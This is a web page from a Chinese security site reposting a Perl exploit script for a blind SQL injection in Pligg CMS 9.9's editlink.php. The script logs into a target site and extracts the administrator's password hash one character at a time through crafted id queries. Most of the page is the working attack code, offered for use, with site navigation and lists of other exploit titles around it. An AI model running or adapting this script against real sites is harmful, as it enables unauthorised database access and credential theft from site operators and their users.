首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Pligg 9.9.0 (editlink.php id) Blind SQL Injection Exploit
来源:www.Schap.Org 作者:Bansal 发布时间:2009-04-21  

#!/usr/bin/perl

######################################################################################
# Pligg v9.9 Blind SQL Injection
#####################################
#
# vuln:
#   editlink.php? SQL Injection:
#   (magic_quotes off)
#
#   This exploit is possible because the $id variable in check_url.php is taken
#   from the url and then used in an SQL query without being sanitized.
#
#####################################
#
#  by Rohit Bansal [rohitisback@gmail.com] www.Schap.Org
#  original advisory: http://www.milw0rm.com/exploits/5406 (Guido Landi)
#
######################################################################################


 use LWP::UserAgent;
 use HTTP::Request;
 use HTTP::Cookies;

@chars = split(//, "0123456789abcdef");
                                                         ####### CHANGE THESE ########
my $url = "http://victim.compath-to-pligg/";                      # site and path to pligg
my $mylink = 1;                                             # link the user posted
my $username = "user";                                      # username to log in with
my $password = "password";                                  # password to log in with

my $hash;
my $content;

print "\nPligg CMS v9.9 editlink.php Blind SQL Injection\n\n";

print "+ Logging in to $url\n";
print "+ Extracting hash...\n";

$b = LWP::UserAgent->new() or die;
$b->agent('Mozilla');
$cj = HTTP::Cookies->new;
$b->cookie_jar($cj);

$req = HTTP::Request->new(POST=>$url."login.php");
$req->content_type('application/x-www-form-urlencoded');
$req->content("username=$username&password=$password&processlogin=1");
$res = $b->request($req);
$cj->extract_cookies($res);

print "User god hash: ";

for($i = 0;$i < 50; $i++)
{
   for($j = 0; $j < 16; $j++)
   {
       $craft  = "editlink.php?id=(select(if((select%20substr(user_pass,$i,1)%20from%20pligg_users%20where%20";
       $craft .= "user_id=1)=\'" . $chars[$j] . "\'," . $mylink . ",-999)))";
       $req = HTTP::Request->new(GET=>$url.$craft);
       $req->content_type('application/x-www-form-urlencoded');
       $res = $b->request($req);

       $content = $res->content;    
    
      if(!($content =~ /not your link/i))
      {
     print $chars[$j];
         $hash .= $chars[$j];
      }
   }
}

print "\n";


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Groovy Media Player 1.1.0 (.m3
·CoolPlayer Portable 2.19.1 (.m
·1by1 1.67 (.m3u File) Local St
·Addonics NAS Adapter (bts.cgi)
·MS Internet Explorer EMBED Mem
·WysGui CMS 1.2b (Insecure Cook
·e107 <= 0.7.15 (extended_user_
·Linux Kernel 2.6 UDEV Local Pr
·TotalCalendar 2.4 Remote Passw
·ClanTiger <= 1.1.1 (slug) Blin
·eLitius 1.0 Arbitrary Database
·cTorrent/DTorrent (.Torrent Fi
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved